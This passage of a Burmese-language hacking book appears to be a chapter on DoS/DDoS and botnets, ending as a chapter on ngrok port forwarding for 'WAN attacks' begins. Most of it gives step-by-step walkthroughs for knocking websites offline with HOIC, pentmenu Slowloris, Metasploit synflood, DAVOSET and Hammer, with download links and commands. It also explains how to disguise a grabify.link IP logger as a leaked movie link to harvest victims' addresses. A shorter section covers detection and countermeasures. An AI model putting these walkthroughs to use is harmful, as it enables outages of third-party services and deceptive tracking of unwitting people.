tjcm;aom pufawGuae aygif;pyfvkyfaqmifjcif;jzifhjzpfap aqmif&GufEdkifygw,f/
xdkodkY puftrsm;BuD;uae OD;wnfcsufwpfckwnf;udk DoS wdkufcdkufrI
vkyfaqmifwmudk Distributed Denial-of-Service (DDoS) attack vdkY ac:qdk
ygw,f/

Botnets
'Dpum;vHk;udkvnf; uRefawmfwdkYtaeeJY &if;ESD;aumif; &if;ESD;ygvdrfhr,f/
Robot eJY Network pum;vHk;ESpfvHk;udk wGJqufjyD; twdkaumuf taeeJY ac:a0:Mu
wJh botnet u wu,fawmh rormwJhy&dk*&rfwpfck (malicious program) om
jzpfygw,f/ rormwJh vkyfaqmifcsufawG vkyfaqmif&mrSm cybercriminal
vdkYac:wJh Cyber &mZ0wfrI usL;vGefr,fholawGu xdef;csKyftoHk;jyKEdkifzdkY
&nf&G,fzefwD;xm;wJh program awGaygh/ tvG,fqHk;ajym&&if wdkufcdkuf&mrSm
yg0ifr,fh wyfom;awGudk pkaqmif;a&;vkyfwJh program awG jzpfygw,f/
 aMumufp&maumif;wmu xdkodkY pkaqmif;&mrSm system owner awG&JU
od&SdrI rygbJ wpfenf;tm;jzifh rodbJ toHk;cscHvdkuf&jcif;rsdK;om jzpfygw,f/ xdkodkY
xdef;csKyfcHvdkuf&wJh program (compromised program) awGudk zombie awGvdkY
ac:qdkjyD; botnet awGudk cluster awGvdkYvnf; ac:Muygao;w,f/ attacker awGu
Cyber &mZ0wfrI wpfpHkwpf&m usL;vGefvdkwJhtcg rdrdwdkY udk,fydkifpufxuf
xdkodkYaom toHk;cscH device awGudk ydkjyD; toHk;jyKvdkMuygw,f/ botnet awGudk web
spidering eJY search engine indexing awGvdk aumif;wJhbufawGrSmvnf;
toHk;jyKEdkifygao;w,f/
botnet awGudk zefwD;arG;jrLxm;jyD; zombie awG rsm;EdkiforQ rsm;atmif
pkjyD; jyefvnfa&mif;csjciff;tygt0if botnet awGudk Ecosystem awGrSmyg toHk;jyK
wmrsdK;awGvnf; rsm;pGm&Sdaeygao;w,f/ 'Dtcef;rSmawmh wwfEdkiforQ xnfhoGif;
aqG;aEG;oGm;ygr,f/

Botnet Tools
botnet tool awGudk market rSm tvG,fwul &&SdEdkifygw,f/ vltrsm;
odMuwJh tool awGuawmh Win32.Shark, Plugbot, Poison Ivy, Illusion eJY Netbot
attacker pwmawGyg/
Win32.Shark uawmh Backdoor Trojan horse program wpfrsdK;
jzpfygw,f/ tjyeftvSef qufoG,fjcif;? firewall bypassing eJY remote
administration tool wpfck jzpfjyD; ul;pufcH&ygu uRefawmfwdkY&JU pepfawGxJudk
aeYpOf tjcm;aom malware awGudk qGJqGJoGif;aerSmjzpfygw,f/ oludk,fwdkifvnf;
spam email awGuaewpfqifh jyefYyGm;zdkY MudK;pm;ygao;w,f/ pop-up
advertisement awGuaewpfqifh ul;pufapjyD;awmh uRefawmfwdkY&JU system
registry xJudk malicious code awGudk xnfhoGif;ygvdrfhr,f/ security software
awGudk ydwfypfzdkY BudK;pm;rSmjzpfjyD; uRefawmfwdkY&JU pepfwpfckvHk;udk attacker u
xdef;csKyfvdkY &oGm;apzdkYvnf; tultnDay;rSmjzpfygw,f/
poison Ivy uawmh Remote Access Trojan (RAT) wpfrsdK;jzpfjyD;awmh
windows uGefysLwmawGtwGuf advanced remote administration tool wpfckvnf;
jzpfygw,f/ 'D tool udk toHk;jyKjyD; attacker u passwords eJY Banking Information
awGvdk ta&;ygwJh tcsuftvufawGudk cdk;,lEdkifrSmjzpfygw,f/ 'DvdkawG
aqG;aEG;aewJhtwGuf bot awG[m software awGvdkYawmh w&m;ao rSwf,lvdkY
r&ygbl;/ bmvdkYvJqdkawmh PlugBot awGonf power adapter avmufyJ &SdwJh
tvGefao;i,fwJh uGefysLwmav;wpfvHk;vnf; jzpfaeEdkifjyD; Penetration testing
device tjzpfvnf; toHk;jyKEdkifvdkY jzpfygw,f/
DoS & DDoS Tools
DDoS attack wpfckrSmawmh malicious code awG ul;pufjcif;cHae&wJh
xdef;csKyfcH pufawGudk toHk;csjyD; target system wpfckqDudk DoS wdkufcdkufrIawGudk
pkaygif;jyKvkyfapwm jzpfygw,f/ xdkodkY DDoS jyKvkyf&mrSm ausmfMum;wJh tol
awGuawmh LOIC (Low Orbit Ion Cannon), HOIC (High Orbit Ion Cannon),
Anonymous-DoS, Tor's Hammer, DDOSIM, DAVOSET, PyLoris, Moihack
Port-Flooder, XOIC eJY OWASP DoS HTTP Post wdkY jzpfygw,f/

txufyg yHkuawmh HOIC udk zGifhvdkufwJhtcg jrifawGY&r,fh yHkpH

jzpfygw,f/ HOIC (High Orbit Ion Cannon) udk prf;oyfMunfhvdkygu
bit.ly/kmn-hoic rSm a'gif;,lEdkifygw,f/ txufygyHkrSm Munfh&if nmbuf
atmufem;av;rSm teDa&mifeJY 0dkif;jyxm;wJh taygif;vu©Pmav;udk
jrifawGY&rSmyg/ tJ'gav;udk ESdyfvdkuf&ifawmh atmufygtwdkif; jrif&ygr,f/
 txufygyHktwkdif; HOIC &JU target udk xnfhoGif;&rSmyg/ http://
odkYr[kwf https:// uae pjyD; target URL udk xnfhay;&ygr,f/ Oyrm
http://www.target.com (or) https://www.target.com ponfjzifhaygh/

txufygtwdkif; URL rSm target website url udk xnfhoGif;Edkifovdk

Power rSmvnf; High xd a&G;cs,fEdkifygw,f/ Nooster rSmvnf;
a&G;cs,fEdkifygao;w,f/ jyD;&if add vdkufwmeJY target ae&mrSm uRefawmfwdkY
ypfrSwfxm;wJh URL udk awGY&ygr,f/ xyfxnfhcsif&if taygif;udk xyfESdyf&rSm jzpfjyD;
a&G;cs,fxm;wJhxJu jyefz,fxkwfcsif&ifawmh tEkwfoauFwudk a&G;cs,f
z,fEdkifygw,f/ toifhjzpfjyDqdk&ifawmh FIRE TEH LAZER! udk ESdyfjyD; DoS
Attack pwifEdkifjyD jzpfygw,f/
 Output ae&mrSm size awG ajymif;vJaewmudk jrifawGY&rSmjzpfjyD; Attack
atmifjrifoGm;wJhtcgrSmawmh tqdkyg Target site onf vkyfaqmifrIawG
aES;auG;av;vHum vHk;0 zGifhr&wJhtxd jzpfoGm;ygvdrfhr,f/

'guawmh uRefawmfwdkY wdkufcdkufaepOfrSm awGYjrif&r,fh yHkpH jzpfygw,f/

Power rSm High udk a&G;cs,fxm;wJhtwGuf vHk;0 &yfwefYoGm;wJhtxd
xda&mufEdkifygw,f/ (tumtuG,f vkyfrxm;bl;qdk&ifaygh)

vkyfaqmifcsuf atmifjrifoGm;wJhtcgrSmawmh tqdkyg site onf

txufyg yHktwdkif; unreachable jzpfoGm;jyD; zGifhr& jzpfoGm;ygw,f/ wdkufcdkufrIudk
&yfwefYypfvdkuf&ifawmh jyefyGifhvmEdkifjyD; xdktwdkif; tcsdefMumjrifhpGm qufvuf
wdkufcdkufcHae&ygvsifawmh aemufqHk;rSm system breakdown jzpfwJhtxd
jzpfoGm;Edkifygw,f/

DoS Attack with Pentmenu in Kali

'Dcgawmh uRefawmfwdkY&JU Kali Linux uae vkyfaqmifMunfh&atmifyg/
pentmenu udk &,lzdkYtwGuf atmufygtwdkif; vkyfaqmifEdkifygw,f/
 git clone https://github.com/GinjaChris/pentmenu.git
udk Terminal
rSm &dkufxnfhvdkuf&Hkyg/ zdkifqdk'fu ao;wJhtwGuf cPav;eJY &vmrSmjzpfygw,f/

jyD;awmh cd command udk oHk;jyD; pentmenu xJudk txufygyHktwdkif;

0ifa&mufvdkufygw,f/ ls eJY list xkwfMunfhwJhtcg pentmenu qdkwJh zdkifav;udk
tpdrf;a&mifeJY azmfjyxm;wm awGY&ygr,f/ run &r,fh program wpfckrSef; tvG,f
odEdkifygw,f/

run &rSmjzpfvdkY executable permission ay;zdkY vdktyfygw,f/ chmod +x

eJY permission ay;vdkufygw,f/

run awmhrSmjzpfvdkY ./ udk toHk;jyKygw,f/ dot slash yg/

txufygtwdkif; olY&JU menu udk awGYjrif&rSmyg/ uRefawmfu DoS

vkyfaqmifwmudk erlem azmfjyrSmjzpfvdkY Options 2 udk a&G;vdkufygw,f/
 xyfay:vmr,fh menu u pdwf0ifpm;p&myg/ enf;vrf; 12 ckeJY
aemufjyefoGm;zdkY wpfck yg0ifaewmudk awG&Y ygr,f/ ICMP Echo Flood, ICMP
Blacknurse, TCP SYN/ACK/RST/XMAS Flood, UDP Flood, SSL DoS,
Slowloris, IPsec DoS, Distraction Scan eJY DNS NXDOMAIN Flood qdkjyD;
awGY&ygr,ff/

uRefawmfh target udk tjcm; terminal wpfckuae scan vkyfMunfh

vdkufygw,f/ jyD;awmh DoS rSm Slowloris udkyJ a&G;cs,fvdkufygw,f/

uRefawmfa&G;cs,fvdkufwmu options 9 yg/

uRefawmfh&JU target udk xnfhoGif; owfrSwfay;&r,fh tqifh jzpfygw,f/

 target websiteudk oGm;jyD; URL udk aumfyD ,lcJhvdkufygw,f/ jyD;awmh
target ae&mrSm xnfhoGif;vdkufjyD; port a&G;cdkif;wJh tqifhrSmawmh default twdkif;yJ
xm;csifwJhtwGuf 80 eJY enter vdkufygw,f/

data bytesta&twGufrSm default u 3000 yg/ uRefawmfuawmh 1

aemufrSm okn 7vHk;awmif xnfhvdkufrdygw,f/ (sorry)

'DtqifhrSm uRefawmfuawmh random tjzpf r udkom a&G;cs,f

vdkufygw,f/

txufygtwdkif; SSL/TLS awG oHk;rSmvm; ar;vmygw,f/ n eJY enter

vdkufygw,f/

ckqdk&ifawmh Slowloris attack process onf ongoing oGm;aewmudk

awGYjrif&ygr,f/
 uRefawmfh target site uawmh b,favmufrS rMumcifrSmyJ
usoGm;ygw,f/ 'Dae&mrSm ajymjyvdkwmu 'Davmufav; vkyfaqmif&HkeJY site wdkif;
usoGm;rSm r[kwfbl; qdkwmyg/ tJonftaMumif; jyD;rS qufaqG;aEG;ygr,f/
ckawmh uRefawmfu pma&;vdkY &&Hkav;yJ vkyfaqmifwmrdkYvdkY terminal rSm Control +
c ESdyfjyD; &yfwefYay;vdkufygw,f/

SYN Flooding in Metasploit

'Dwpfcgawmh Metasploit udk oHk;jyrSmrdkY txufyg command av;awGeJY

msf xJ 0ifvdkufygw,f/

'Dwpfcgawmh msf uae DoS vkyfaqmifrSmjzpfvdkY auxiliary/dos/tcp

xJu synflood udk use vdkufygw,f/

RHOST udk IP address owfrSwfay;jyD; show options ac:Munfhvdkuf

ygw,f/
 Required column rSm Yes vdkY
jyxm;wJhae&mawGrSm uGufvyf jzpfrae&
ygbl;/ uGufvyfjzpfae&if set udk toHk;jyKjyD; xnfhoGif;ay;zdkY vdkygw,f/ ck
uRefawmf azmfjyxm;wJh yHkt&awmh required column rSm yes vdkY azmfjyxm;wJh
rjzpfrae xnfhoGif;&r,fh tydkif;awGrSm tm;vHk; jynfhpHkaewm awGY&ygr,f/

Exploit vdkufygjyD/ SYN flooding pwifaeygjyD/ 'D vkyfaqmifcsufawG

udk attacker machine rsm;rsm;u vkyfaqmifavav ydkjyD; xda&mufrI &Sdavavyg/
 MetasploitxJrSm tvm;wl aqmif&GufEdkifwJh dos auxiliary awGudk
search eJYvnf; txufygtwdkif; &SmazG Edkifygao;w,f/

DoS with DAVOSET in Kali Linux

txufygtwdkif; DAVOSET udk &,ljyD;vnf; DoS Attack udk

vkyfaqmifEdkifygao;w,f/
 jyD;&if DAVOSET folder xJudk cd eJY 0ifa&mufjyD; list xkwfMunfhr,f
qdk&ifawmh davoset.pl qdkwJh zdkifav;udk jrifawGY&ygr,f/ Perl language eJY
a&;xm;wJh zdkifav; jzpfwJhtwGuf Perl eJYyJ zGifh&ygr,f/

oluawmh install p&mrvdkwJH portable application trsdK;tpm;yg/

zGifhvdkufwmeJY txufygtwdkif; site udk xnfhoGif;&r,fhae&mudk wef;jyD; a&muf
ygr,f/

olY&JU tm;omcsufu olYqDrSm pkaqmif;xm;&SdwJh zombie server awGeJY

csdwfqufjyD; DDoS attack jyKvkyfjcif; jzpfygw,f/ vkyfaqmif& vG,fulovdk
xda&mufrIvnf; aumif;ygw,f/ owdjyK&rSmuawmh site awG xnfhoGif;wJhtcg
http & https awG rxnfh&wmygyJ/ www.example.com ponfjzifh wdkuf&dkuf
jznfhoGif;&rSm jzpfygw,f/

DDoS Botnet Attack with Hammer

vdktyfwJh hammer udk txufygtwdkif; git clone eJY &,lyg/

 cd
udk oHk;jyD; hammer folder xJudk 0ifa&mufvdkufyg/ jyD;vsif list
xkwfMunfhygu hammer.py udk jrifawGY&ygr,f/

python3 eJY a&;xm;wmrdkYvdkY python3 hammer.py udk oHk;jyD; zGifhMunfhyg/

-h = help, -s = server ip, -p = port eJY -t = turbo default 135 vdkY awGY&ygr,f/

Terminal aemufwpfck zGihfjyD; target site udk ping Munfhyg/ IP address

&&HkomjzpfjyD;IP &jyDqdkwmeJY Control + C eJY &yfvdkufEdkifygw,f/ IP address udk
ul;xm;yg/

cke hammer zGifhxm;wJh terminal xJrSm txufygtwdkif; &dkufxnfhjyD;

DDoS jyKvkyfEdkifygw,f/ server rSm pkaqmif;xm;&SdwJh bot awGudk toHk;jyK
wdkufcdkufwmjzpfvdkY xda&mufrI ydkaumif;ygw,f/
 server maybe down awGcsnf; jrifawGYae&jyD qdk&ifawmh rl&if; site rSm
user awG toHk;jyKvdkY r&EdkifwJhtajctae jzpfoGm;ygjyD/

'DyHkuawmh BBC website udk DDoS wdkufcdkufcH&pOfu yHk jzpfygw,f/

uRefawmf azmfjy aqG;aEG;cJhwmawGtjyif Kali Linux rSm yg0ifjyD; jzpfwJh
ettercap >> unified sniffing >> plugin >> manage plugins xJu DoS attack
uaevnf; DoS attack udk vkyfaqmifEdkifygao;w,f/
tJ'gawGudkawmh xyfjyD; razmfjyawmhbl;aemf/ ckawmh uRefawmfwdkY
twGuf ydkjyD; pdwf0ifpm;p&maumif;r,fh udk,fydkif bot awG zefwD;wJhtaMumif;
quf&atmif/ udk,fydkif botnet awG zefwD;jyD; DDoS attack jyKvkyfjcif;aygh/
Creating Own Botnets on Any Device
ck azmfjyr,fh enf;vrf;uawmh DDoS Attack awG vkyfaqmif&mrSm
tvGef aumif;rGefjyD; xda&mufrI &Sdapr,fh botnet awGudk udk,fydkif zefwD;jyD;
vkyfaqmifr,fh tydkif; jzpfygw,f/ 'DvkyfaqmifcsufawGtwGufawmh uGefysLwm
uaejzpfap (Windows, Mac & Linux), zkef;uaejzpfap aygh/ vkyfaqmifvdkY
&apr,fh enf;vrf; jzpfygw,f/ Bot awGudk pD;yGm;jzpf arG;jrLcsifolawGvnf;
tqifajywmayghaem/

yxrqHk;taeeJY grabify.link udk browser uae 0ifa&mufvdkufyg/

jyD;&ifawmh Account wpfckzGifhzdkYtwGuf Register vkyf&ygr,f/ Register
vkyfzdkYtwGufuawmh tvGefvG,fulygw,f/

Sign up jyKvkyfjyD;ygu rdrd mail inbox xJodkY

pmwpfapmif a&mufvm
ygr,f/ Account Confirm jzpfoGm;jyD qdk&ifawmh yxrwpfqifh jyD;ygjyD/
'kwd,tqifh twGufuawmh toHk;csr,fh ig;pm wpfck zefwD;zdkYyg/ tJonftwGuf
vltrsm;pk pdwf0ifpm;r,fh link wpfckudk &SmzdkY vdkygw,f/ uRefawmfuawmh
vG,fvG,fululygyJ/ Youtube xJ 0ifjyD; AD'D,dkzdkifwpfck&JU Link (URL) udk
copy ,lvdkufygw,f/ jyD;&if Browser uae grabify.link udk jyefoGm;vdkufyg/
 yHkxJu Enter a valid URL qdkwJh ae&mrSm cke ul;vmwJh AD'D,dk Link
av;udk xnfhoGif;vdkufygw,f/ jyD;awmh Create URL udk ESdyfvdkufygw,f/

txufyg yHkrSm Munfh&if uRefawmfwdkY zefwD;vdkufwJh Link Information

awGudk azmfjyxm;wm awGY&ygr,f/ New URL (Send them this link)
qdkwJhae&mu Link udk aumfyD ,l&rSm jzpfygw,f/ jyD;awmh avmavmq,frSm
&Hkawmif rwif&ao;wJh Zmwfum; qdkjyD; Link udk wpfae&m&muae Share
ay;vdkufEdkifygw,f/

uRefawmfuawmh ckrS zefwD;vdkufwmjzpfvdkY Results : 0 jzpfaewm

awGY&rSmyg/ zefwD;xm;wJh Link udk click olawG rsm;vmwmeJYtrQ result awGvnf;
rsm;vmrSmjzpfygw,f/ yHkxJrSm jrif&wJh Hide Bots udkvnf; zGifhxm;Edkifygw,f/
Link click vmolawG&JU IP address awGudkvnf; Copy ul;xm;Edkifygao;w,f/
DoS Attack Detection
wu,fawmh DoS attack udk detect jzpfzdkYqdkwm rvG,fulygbl;/ DoS
attack udk &SmazGazmfxkwfwJh enf;ynm[m expected traffic pattern awGay:rSm
rlwnfaeygw,f/ omreftoHk;jyKwJh tajctaeeJY expected traffic pattern xuf
ydkrdkausmfvGef toHk;jyKvmwJhtcg omrefr[kwfwJh tajctaewpfcktjzpf owfrSwf
rSwfom;jcif;rsdK;yg/ DoS attack qdkwm tcsdeftcgra&G; usa&mufvmEdkifw,f
qdkwm od&Sdxm;&rSmjzpfovdk tJonftwGuf BudKwif jyifqifrIawGudk
vkyfaqmifxm;zdkY vdktyfygw,f/ service wpfckvHk; degrade rjzpfrDrSmyJ DoS
attack usa&mufvmwmudk od&SdEdkifzdkY vdktyfygw,f/ t"dutm;jzifhawmh Detection
technique oHk;ck &Sdygw,f/ Activity Profiling, Sequential Change-point
detection eJY wavelet analysis wdkY jzpfygw,f/ 'gawGonf BudKwifvkyfaqmifxm;
zdkY vdktygwJh countermeasure awGvnf; jzpfaeygao;w,f/

Countermeasures
Countermeasure qdkwm tEå&m,f wpfpHkwpf&m BuHKvmwJhtcg od&SdjyD;
jyefvnfwkefYjyefvkyfaqmifEdkifzdkYtwGuf BudKwifpDpOf jyifqifxm;&r,fht&mawG vdkY
tMurf;zsif; rSwf,lEdkifygw,f/ umuG,fa&;tpDtpOf vdkY ajymvdkY&ayr,fh olY&JU
qdkvdk&if;u 'Dhxuf ydkygw,f/ tay:rSm aqG;aEG;cJhwJh detection technique oHk;ckudk
jyefaqG;aEG;oGm;ygr,f/
Activity profiling onf network traffic ay: tajccHygw,f/ attack
wpfckudk clusters awGMum;rSm activity level wdk;yGm;vmrIt& cGJjcm;owfrSwf
ygw,f/ DDoS jzpfpOfwpfckrSm Munfhr,fqdk&if activity (vkyfaqmifcsuf)
awGonf xif&Sm;wJh cluster awG tm;vHk;xJrSm odompGm wdk;vmygw,f/ Activity
profiling udk vkyfaqmifr,f qdk&ifawmh network packet awG&JU header
information awGudk apmifhMunfhppfaq;jcif; tm;jzifh vkyfaqmifEdkifygw,f/
jzpfEdkifacs&SdwJh UDP service tm;vHk;&JU wpfckcsif;pDtvdkuf pD;qif;rI
(flow) awGudk cGJjcrf;pdwfjzmcsifw,fqdk&ifawmh uRefawmfwdkYtaeeJY flow order
aygif; 264 ckavmufudk apmifhMunfhzdkY vdktyffygvdrfhr,f/ bmvdkYvJqdkawmh SNMP,
TCP, ICMP pwJh protocol awGyg yg0ifaevdkY jzpfygw,f/ cluster wpfckrSm
tpOfvdkuf jzpfwnfaewJh pD;qif;rItm;vHk;udk aygif;pyfvdkufr,fqdk&if xdk cluster
xJrSm&SdwJh activity level udk &&Sdygw,f/
'kwd, enf;vrf;wpfcku Sequential change-point detection technique
jzpfygw,f/ attack wpfckaMumifh jzpfay:vmwJh traffic awG &kwfcsnf; ajymif;vJjcif;
awGudk algorithm awGu cGJjcm;azmfjyay;Edkifygw,f/ 'D Detection technique onf
port tvdkuf? address tvdkuf? protocol tvdkuf target traffic data awGudk OD;pGm
ppfxkwfay;ygw,f/ jyD;awmh &vmwJh pD;qif;rIawGudk time series tjzpf
odrf;qnf;xm;ygw,f/ xdk time series awGudk cluster activity awGudk udk,fpm;jyK
wJh time domain tjzpf rSwf,ljyD; DoS flooding attack wpfck pwifwJhtcg
jzpfay:vmwJh tcsdef ajymif;vJrIawGudk jyoay;Edkifygw,f/ xdkodkY pOfqufrjywf
owfrSwfxm;wJh a'wmawGay:rSm aumif;pGm vkyfaqmifEdkifpGrf;&SdwJh algorithm
wpfrsdK;jzpfwJh CUSUM vdk change-point detection algorithm onf jzpfay:vmwJh
ajymif;vJrIawGay: tajccHjyD; DoS attack awGudk cGJjcm;nTefjyEdkifygw,f/
wwd,ajrmuf Detection technique uawmh wavelet analysis
jzpfygw,f/ Input signal awGudk wavelet awGxJrSm spectral component
awGtjzpf azmfjyxm;ygw,f/ wavelet awG[m wpfqufwpfpyfwnf;
jzpfay:EdkifwJh tcsdefeJY BudrfEIef;azmfjycsufawGudk vkyfaqmifay;EdkifwmaMumifh
BudrfEIef;wpfckrSm tcsdefuGm[rIay: rlwnfjyD; qHk;jzwfay;Edkifwm jzpfygw,f/
bmvdkYvJqdkawmh DoS eJY DDoS awG[m tcsdefcPtwGif;rSm BudrfEIef;aygif;
rsm;pGmudk ay;ydkY vkyfaqmifwJh enf;ynmwpfrsdK; jzpfvdkY omref toHk;jyKcsdefawGrSm
jzpfay:EdkifwJh tjrifhqHk; BudrfEIef;eJY tcsdef tcsdK;xuf rsm;pGm ydkomaerSmrdkYygyJ/
botnet eJY ywfoufjyD; umuG,fa&;vkyfaqmifp&m enf;vrf; av;ck
&Sdygw,f/ yxrenf;vrf;u RFC 3704 filtering udk toHk;jyKjyD; toHk;rjyKwJh IP
address awGqDrS traffic awGudk ppfxkwfzdkY jzpfygw,f/ 'kwd, enf;vrf;uawmh
source awGxH inform rvkyfbJ network node awGGqDrSm 0ifa&mufvmwJh traffic
awGudk avQmhcsjcif;tm;jzifh black hole filtering vkyfzdkY jzpfygw,f/ aemufqHk;enf;
vrf; uawmh CISCO IPS Source IP reputation filtering udk toHk;jyKzdkYyg/
aemufqHk;enf;vrf;onf DDoS umuG,fjcif;twGufyg toHk;0ifygao;w,f/
aemufwpfcsufu uRefawmfwdkYtaeeJY DDoS udk umuG,fEdkifwJh tool
awGudkvnf; odxm;oifhygw,f/ tool qdkayr,fh software & hardware ESpfrsdK;vHk;
&Sdygw,f/ bmawGvJqdkawmh DDoS Protector, FortiDDoS appliances, Arbor
Pravail Availability Protection System, Cisco Guard XT, Wanguard, SDL
Regex Fuzzer, NetFlow Analyzer, Netscaler application firewall eJY Anti-DDoS
Guardian wdkYyJ jzpfygw,f/
uRefawmfwdkY&JU euf0yfxJrSm &SdaewJh tm;enf;csuf (vulnerabilities)
awGudk &SmazGjyD; jyifqifEdkifzdkY BudK;pm;&ygr,f/ 'DvdkvkyfaqmifzdkYtwGufawmh
Penetration Testing &JU tcef;u@u ta&;ygvmygw,f/ uRefawmfwdkYtaeeJY
uRefawmfwdkY&JU Network awGudk tm;enf;csuf&SmazGjyifqifwmrsdK;
vkyfaqmifrxm;bl;qdk&ifawmh attacker awGtaeeJY uRefawmfwdkY&JU network
awGxJudk xGif;azmuf0ifa&mufwmrsdK;? DDoS attack rsdK;awG jyKvkyfjyD; vkyfief;pOf
awG ysuf,Gif;oGm;atmif aqmif&GufwmrsdK;awGudk awGYBuHK&Edkifygw,f/
 vkyfaqmifoifhwJh tqifh tenf;i,fudk aqG;aEG;azmfjyay;oGm;ygr,f/
1/ wnfjrJrIeJY vkyfaqmifcsuf awGudk prf;oyfppfaq;EdkifzdkYtwGuf application or
server ay:rSm artificial load wpfckudk xm;&Sdjcif;jzifh heavy load awGudk
ppfaq;zdkYyg/ 'DvdkvkyfaqmifEdkifzdkYtwGuf Webserver Stress Tool, Web Stress
Tester eJY JMeter wdkYvdk tool awGudk toHk;jyKEdkifygw,f/
2/ uRefawmfwdkY&JU euf0yfawGudk Scanning jyKvkyfjyD; tm;enf;csufawGudk &SmazG
ppfaq;&ygr,f/ tJ'gawG vkyfaqmifEdkifzdkYtwGufawmh uRefawmfwdkYtaeeJY Nmap,
GFI LANGuard eJY Nessus wdkYvdk Powerful Scanner awGudk toHk;jyKEdkifygw,f/
3/ connection request packet awGudk tqufrjywf toHk;jyKjyD; uRefawmfwdkY&JU
server ay:rSm SYN attack wpfck run MunfhEdkifygw,f/ run zdkYawmh DoS HTTP,
Sprut eJY PHDoS wdkYudk oHk;Edkifygw,f/
4/ aemufwpfcsufu TCP eJY UDP packet aygif;rsm;pGmudk tqufrjywf
ay;ydkYjcif;tm;jzifh Port Flooding attack rsdK;awGvnf; vkyfaqmifMunfhoifhygw,f/
'Dvdk prf;oyf vkyfaqmifzdkYtwGufawmh TCP port awGtwGuf Mutilate udk
oHk;EdkifjyD; UDP port awGtwGufawmh Pepsi5 udk toHk;jyKEdkifygw,f/
5/ email server awG xm;&Sdygu email bomber awGudk run MunfhjyD;
prf;oyfEdkifygw,f/ Mail Bomber wdkY Advanced Mail Bomber tool wdkYudk
oHk;jyD;aygh/
6/ guest book eJY website form awGrSm bogus entry vdkYac:wJh tcsuftvuftwk
awG jznfhoGif;jcif;? xif&mjrif&m entry t&SnfBuD;awG jznfhoGif;Munfhjcif; pwJh
vkyfaqmifcsufawGeJY flood jzpfatmif vkyfMunfhyg/
7/ &SmazGawGY&SdorQ tcsufawGudk rSwfwrf;wifxm;jyD; oufqdkif&m u@tvdkuf
wm0ef&SdolawGxH wifjyjcif; nSdEIdif;jyifqifjcif; jyefvnfppfaq;jcif; pwmawG
vkyfaqmifEdkifygw,f/
txufyg tqifh 7 qifhonf Penetrating Tester awGtaeeJY aqmif&Guf
oifhwJh tcsufawG jzpfygw,f/ 'DtcsufawGudk *&kpdkuf &SmazGjyD; vdktyfcsufawG
jyifqifjznfhwif;xm;EdkifjyD qdk&ifawmh uRefawmfwdkY&JU pepfawGonf tweftoifh
vHkjcHKrI &SdoGm;ygjyD/ Advanced taeeJY qufvkyf&rSmawGu defence play qdkwJh
umuG,fa&; tpDtpOf vkyfaqmifxm;zdkY? Layered DDoS strategy jyifqifxm;zdkY?
DNS server awGeJY tjcm;aom critical infrastructure awGudk umuG,fxm;zdkYeJY
DDoS protection awGudk vkyfaqmifxm;zdkY vdktyfygw,f/
 CHAPTER 26: Port Forwarding for WAN attacks

Introduction

a&SUrSmvnf; uRefawmfwdkYtaeeJY Metasploit awG Setoolkit awGudk

prf;oyf toHk;jyKcJhMujyD;jzpfygw,f/ 'Dvdk toHk;jyKpOfrSm Same Network twGif;rSm
om vkyfaqmifEdkifjyD; udk,fhzkef;eJYudk,f zGifhoHk;aewJholawGtwGufawmh xdcdkufrI r&Sd
EdkifwmawGY&ygw,f/ Same Network xJrSmyJ wdkufcdkufEdkifwJh Attack udk LAN
attack vdkY ac:Muygw,f/ Local Area Network xJrSmom toHk;jyK wdkufcdkufEdkif vdkY
jzpfygw,f/ 'Dawmh uRefawmfwdkYtaeeJY 'DwdkufcdkufrIawGudk vkyfaqmifzdkYtwGuf
target &Sd&mudk vdkufjyD; Same Network txJ a&mufwJhtxd xdkifapmifh&rvdk
jzpfaeygr,f/
wu,fawmh tJvdk vkyfaqmifzdkYqdkwm rvG,fygbl;/ uRefawmfwdkY&JU
Target onf tjcm;EdkifiHrSmvnf; jzpfcsifjzpfaerSmyg/ 'Dawmh uRefawmfwdkY&JU
wdkufcdkufrIawGudk LAN tqifhuae Wide Area Network (WAN attack) tqifh
xd jyKjyif&rSm jzpfygw,f/ 'DtajctaerSmawmh ck Chapter rSm yg0ifwJh enf;vrf;
aygif;rsm;pGmudk toHk;jyKEdkifrSm jzpfygw,f/ 'gudk Port Forwarding tEkynm vdkYyJ
qdkMuygpdkY/ 'DtEkynmudk uRefawmfwdkYtaeeJY toHk;csEdkifr,fh enf;rf;av;awGudk
pkpnf;jyD; erlem Attack awGeJY vufawGY ,SOfwGJjyay;vdkufygw,fcifAsm/

Port Forwarding for Kali (Method 1)

yxrqHk; enf;vrf;wpfcktaeeJY tvG,fulqHk; toHk;jyKEdkifzdkYtwGuf
aumif;rGefwJh app wpfckudk azmfjyay;vdkygw,f/ bit.ly/ngrok-kmn udk Browser rSm
&dkufxnfhjyD; Enter vdkufwmeJY 16MB avmuf&SdwJh ngrok zdkifav;udk &&Sdygr,f/

a'gif;jyD;oGm;wJhtcgrSmawmh Terminal udk zGifhjyD; cd command eJY

Downloads directory xJudk txufygtwdkif; 0ifa&mufvdkufyg/

Downloads directory xJ a&mufoGm;jyDqdk&ifawmh mv command udk

oHk;jyD; ngrok zdkifudk system xJu usr/bin/ xJudk txufyHkygtwdkif; a&TUvdkufyg/
 txufygyHktwdkif; cd /usr/bin udkoHk;jyD; ajymif;a&TUvdkufwJh directory
xJudk qufvuf 0ifa&mufvdkufyg/ 'gqdk&ifawmh uRefawmfwdkYtaeeJY ngrok udk
oHk;Edkifr,fh ae&mudk a&mufoGm;ygjyD/ 'gayr,fh uRefawmfwdkY a'gif;,lxm;wJh ngrok
onf executable program wpfck jzpfwmaMumifh executable permission (+x)
ay;zdkY vdkaeygao;w,f/

ckqdk&ifawmh uRefawmfwdkYtaeeJY run vdkY &wJhtqifhudk a&mufoGm;ygjyD/

zGifhxm;wJh Terminal awGudk ydwfjyD; Terminal topfxyfzGifhyg/

topfzGifhxm;wJh Terminal rSm ngrok vdkY &dkufxnfhjyD; enter vdkuf&HkeJY

ngrok taMumif; azmfjycsufawGeJY erlem toHk;jyKyHkawGudk awGYjrif&ygr,f/
'gqdk&ifawmh uRefawmfwdkYtaeeJY Terminal &JU b,fae&muaerqdk ngrok udk
ac:oHk;vdkY &jyDqdkwm odEdkifygw,f/ uJ ckawmh uRefawmfwdkY prf;oHk;Munfh&atmif/

'DyHku Terminal ESpfckzGifhjyD; jydKifwl azmfjywmyg/ ngrok http 80 eJY ngrok

http 4444 udk Forward vdkyfvdkufwm jzpfygw,f/ tu,fí uRefawmfwdkYu tcp
port 1234 udk zGifhcsifw,f qdkygpdkY/ 'gqdk&ifawmh ngrok tcp 1234 qdkjyD; &dkufxnfh
